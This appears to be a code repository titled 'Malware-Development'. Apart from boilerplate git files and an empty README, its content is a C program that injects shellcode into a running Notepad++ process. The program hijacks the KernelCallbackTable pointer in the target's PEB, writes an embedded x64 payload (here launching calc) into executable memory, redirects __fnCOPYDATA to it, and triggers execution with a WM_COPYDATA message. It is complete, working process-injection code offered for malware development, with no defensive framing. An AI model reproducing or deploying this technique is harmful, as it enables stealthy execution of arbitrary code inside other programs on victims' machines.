├── .gitattributes ├── .gitignore ├── Process Injection └── peb_KCT_injector.c └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /Process Injection/peb_KCT_injector.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef struct _KERNELCALLBACKTABLE_T { 7 | ULONG_PTR __fnCOPYDATA; 8 | ULONG_PTR __fnCOPYGLOBALDATA; 9 | ULONG_PTR __fnDWORD; 10 | ULONG_PTR __fnNCDESTROY; 11 | ULONG_PTR __fnDWORDOPTINLPMSG; 12 | ULONG_PTR __fnINOUTDRAG; 13 | ULONG_PTR __fnGETTEXTLENGTHS; 14 | ULONG_PTR __fnINCNTOUTSTRING; 15 | ULONG_PTR __fnPOUTLPINT; 16 | ULONG_PTR __fnINLPCOMPAREITEMSTRUCT; 17 | ULONG_PTR __fnINLPCREATESTRUCT; 18 | ULONG_PTR __fnINLPDELETEITEMSTRUCT; 19 | ULONG_PTR __fnINLPDRAWITEMSTRUCT; 20 | ULONG_PTR __fnPOPTINLPUINT; 21 | ULONG_PTR __fnPOPTINLPUINT2; 22 | ULONG_PTR __fnINLPMDICREATESTRUCT; 23 | ULONG_PTR __fnINOUTLPMEASUREITEMSTRUCT; 24 | ULONG_PTR __fnINLPWINDOWPOS; 25 | ULONG_PTR __fnINOUTLPPOINT5; 26 | ULONG_PTR __fnINOUTLPSCROLLINFO; 27 | ULONG_PTR __fnINOUTLPRECT; 28 | ULONG_PTR __fnINOUTNCCALCSIZE; 29 | ULONG_PTR __fnINOUTLPPOINT5_; 30 | ULONG_PTR __fnINPAINTCLIPBRD; 31 | ULONG_PTR __fnINSIZECLIPBRD; 32 | ULONG_PTR __fnINDESTROYCLIPBRD; 33 | ULONG_PTR __fnINSTRING; 34 | ULONG_PTR __fnINSTRINGNULL; 35 | ULONG_PTR __fnINDEVICECHANGE; 36 | ULONG_PTR __fnPOWERBROADCAST; 37 | ULONG_PTR __fnINLPUAHDRAWMENU; 38 | ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD; 39 | ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD_; 40 | ULONG_PTR __fnOUTDWORDINDWORD; 41 | ULONG_PTR __fnOUTLPRECT; 42 | ULONG_PTR __fnOUTSTRING; 43 | ULONG_PTR __fnPOPTINLPUINT3; 44 | ULONG_PTR __fnPOUTLPINT2; 45 | ULONG_PTR __fnSENTDDEMSG; 46 | ULONG_PTR __fnINOUTSTYLECHANGE; 47 | ULONG_PTR __fnHkINDWORD; 48 | ULONG_PTR __fnHkINLPCBTACTIVATESTRUCT; 49 | ULONG_PTR __fnHkINLPCBTCREATESTRUCT; 50 | ULONG_PTR __fnHkINLPDEBUGHOOKSTRUCT; 51 | ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX; 52 | ULONG_PTR __fnHkINLPKBDLLHOOKSTRUCT; 53 | ULONG_PTR __fnHkINLPMSLLHOOKSTRUCT; 54 | ULONG_PTR __fnHkINLPMSG; 55 | ULONG_PTR __fnHkINLPRECT; 56 | ULONG_PTR __fnHkOPTINLPEVENTMSG; 57 | ULONG_PTR __xxxClientCallDelegateThread; 58 | ULONG_PTR __ClientCallDummyCallback; 59 | ULONG_PTR __fnKEYBOARDCORRECTIONCALLOUT; 60 | ULONG_PTR __fnOUTLPCOMBOBOXINFO; 61 | ULONG_PTR __fnINLPCOMPAREITEMSTRUCT2; 62 | ULONG_PTR __xxxClientCallDevCallbackCapture; 63 | ULONG_PTR __xxxClientCallDitThread; 64 | ULONG_PTR __xxxClientEnableMMCSS; 65 | ULONG_PTR __xxxClientUpdateDpi; 66 | ULONG_PTR __xxxClientExpandStringW; 67 | ULONG_PTR __ClientCopyDDEIn1; 68 | ULONG_PTR __ClientCopyDDEIn2; 69 | ULONG_PTR __ClientCopyDDEOut1; 70 | ULONG_PTR __ClientCopyDDEOut2; 71 | ULONG_PTR __ClientCopyImage; 72 | ULONG_PTR __ClientEventCallback; 73 | ULONG_PTR __ClientFindMnemChar; 74 | ULONG_PTR __ClientFreeDDEHandle; 75 | ULONG_PTR __ClientFreeLibrary; 76 | ULONG_PTR __ClientGetCharsetInfo; 77 | ULONG_PTR __ClientGetDDEFlags; 78 | ULONG_PTR __ClientGetDDEHookData; 79 | ULONG_PTR __ClientGetListboxString; 80 | ULONG_PTR __ClientGetMessageMPH; 81 | ULONG_PTR __ClientLoadImage; 82 | ULONG_PTR __ClientLoadLibrary; 83 | ULONG_PTR __ClientLoadMenu; 84 | ULONG_PTR __ClientLoadLocalT1Fonts; 85 | ULONG_PTR __ClientPSMTextOut; 86 | ULONG_PTR __ClientLpkDrawTextEx; 87 | ULONG_PTR __ClientExtTextOutW; 88 | ULONG_PTR __ClientGetTextExtentPointW; 89 | ULONG_PTR __ClientCharToWchar; 90 | ULONG_PTR __ClientAddFontResourceW; 91 | ULONG_PTR __ClientThreadSetup; 92 | ULONG_PTR __ClientDeliverUserApc; 93 | ULONG_PTR __ClientNoMemoryPopup; 94 | ULONG_PTR __ClientMonitorEnumProc; 95 | ULONG_PTR __ClientCallWinEventProc; 96 | ULONG_PTR __ClientWaitMessageExMPH; 97 | ULONG_PTR __ClientWOWGetProcModule; 98 | ULONG_PTR __ClientWOWTask16SchedNotify; 99 | ULONG_PTR __ClientImmLoadLayout; 100 | ULONG_PTR __ClientImmProcessKey; 101 | ULONG_PTR __fnIMECONTROL; 102 | ULONG_PTR __fnINWPARAMDBCSCHAR; 103 | ULONG_PTR __fnGETTEXTLENGTHS2; 104 | ULONG_PTR __fnINLPKDRAWSWITCHWND; 105 | ULONG_PTR __ClientLoadStringW; 106 | ULONG_PTR __ClientLoadOLE; 107 | ULONG_PTR __ClientRegisterDragDrop; 108 | ULONG_PTR __ClientRevokeDragDrop; 109 | ULONG_PTR __fnINOUTMENUGETOBJECT; 110 | ULONG_PTR __ClientPrinterThunk; 111 | ULONG_PTR __fnOUTLPCOMBOBOXINFO2; 112 | ULONG_PTR __fnOUTLPSCROLLBARINFO; 113 | ULONG_PTR __fnINLPUAHDRAWMENU2; 114 | ULONG_PTR __fnINLPUAHDRAWMENUITEM; 115 | ULONG_PTR __fnINLPUAHDRAWMENU3; 116 | ULONG_PTR __fnINOUTLPUAHMEASUREMENUITEM; 117 | ULONG_PTR __fnINLPUAHDRAWMENU4; 118 | ULONG_PTR __fnOUTLPTITLEBARINFOEX; 119 | ULONG_PTR __fnTOUCH; 120 | ULONG_PTR __fnGESTURE; 121 | ULONG_PTR __fnPOPTINLPUINT4; 122 | ULONG_PTR __fnPOPTINLPUINT5; 123 | ULONG_PTR __xxxClientCallDefaultInputHandler; 124 | ULONG_PTR __fnEMPTY; 125 | ULONG_PTR __ClientRimDevCallback; 126 | ULONG_PTR __xxxClientCallMinTouchHitTestingCallback; 127 | ULONG_PTR __ClientCallLocalMouseHooks; 128 | ULONG_PTR __xxxClientBroadcastThemeChange; 129 | ULONG_PTR __xxxClientCallDevCallbackSimple; 130 | ULONG_PTR __xxxClientAllocWindowClassExtraBytes; 131 | ULONG_PTR __xxxClientFreeWindowClassExtraBytes; 132 | ULONG_PTR __fnGETWINDOWDATA; 133 | ULONG_PTR __fnINOUTSTYLECHANGE2; 134 | ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX2; 135 | } KERNELCALLBACKTABLE; 136 | 137 | int main(int argc, char **argv) { 138 | unsigned char payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00"; 139 | DWORD PID; 140 | NTSTATUS(*NtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); 141 | PROCESS_BASIC_INFORMATION pbi; 142 | PEB peb; 143 | DWORD dwBytesRead = 0; 144 | DWORD64 *dwKct; 145 | KERNELCALLBACKTABLE kct; 146 | SIZE_T payloadSize = sizeof(payload); 147 | 148 | HWND hWindow = FindWindowA("Notepad++", NULL); 149 | printf("[+] Window Handle: 0x%p\n", hWindow); 150 | 151 | GetWindowThreadProcessId(hWindow, &PID); 152 | printf("[+] Process ID: %d\n", PID); 153 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); 154 | 155 | printf("Process PID %d HANDLE 0x%p\n", PID, hProc); 156 | 157 | NtQueryInformationProcess = GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryInformationProcess"); 158 | printf("NtQueryInformationProcess at 0x%p\n", NtQueryInformationProcess); 159 | 160 | NtQueryInformationProcess(hProc, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL); 161 | printf("PROCESS_BASIC_INFORMATION at 0x%p\n", pbi); 162 | printf("PROCESS_BASIC_INFORMATION PebBaseAddress at 0x%p\n", pbi.PebBaseAddress); 163 | 164 | ReadProcessMemory(hProc, pbi.PebBaseAddress, &peb, sizeof(PEB), &dwBytesRead); 165 | printf("PEB at 0x%p. Read %d bytes\n", peb, dwBytesRead); 166 | 167 | dwKct = *(DWORD64*)((unsigned char*)&peb + 0x58); 168 | printf("KERNELCALLBACKTABLE at 0x%p\n", dwKct); 169 | 170 | ReadProcessMemory(hProc, dwKct, &kct, sizeof(KERNELCALLBACKTABLE), &dwBytesRead); 171 | printf("KERNELCALLBACKTABLE.__fnCOPYDATA at 0x%p. Read %d bytes\n", kct.__fnCOPYDATA, dwBytesRead); 172 | 173 | // Write the payload to remote process 174 | LPVOID payloadAddr = VirtualAllocEx(hProc, NULL, payloadSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 175 | WriteProcessMemory(hProc, payloadAddr, payload, payloadSize, NULL); 176 | printf("[+] Payload Address: 0x%p\n", payloadAddr); 177 | 178 | // 4. Write the new table to the remote process 179 | LPVOID newKCTAddr = VirtualAllocEx(hProc, NULL, sizeof(kct), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 180 | kct.__fnCOPYDATA = (ULONG_PTR)payloadAddr; 181 | WriteProcessMemory(hProc, newKCTAddr, &kct, sizeof(kct), NULL); 182 | printf("[+] __fnCOPYDATA: 0x%p\n", kct.__fnCOPYDATA); 183 | 184 | WriteProcessMemory(hProc, (PBYTE)pbi.PebBaseAddress + 0x58, &newKCTAddr, sizeof(ULONG_PTR), NULL); 185 | printf("[+] Remote process PEB updated\n"); 186 | 187 | COPYDATASTRUCT cds; 188 | WCHAR msg[] = L"Pwn"; 189 | cds.dwData = 1; 190 | cds.cbData = lstrlen(msg) * 2; 191 | cds.lpData = msg; 192 | SendMessage(hWindow, WM_COPYDATA, (WPARAM)hWindow, (LPARAM)&cds); 193 | printf("[+] Payload executed\n"); 194 | 195 | return 0; 196 | } 197 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malware-Development 2 | 3 | --------------------------------------------------------------------------------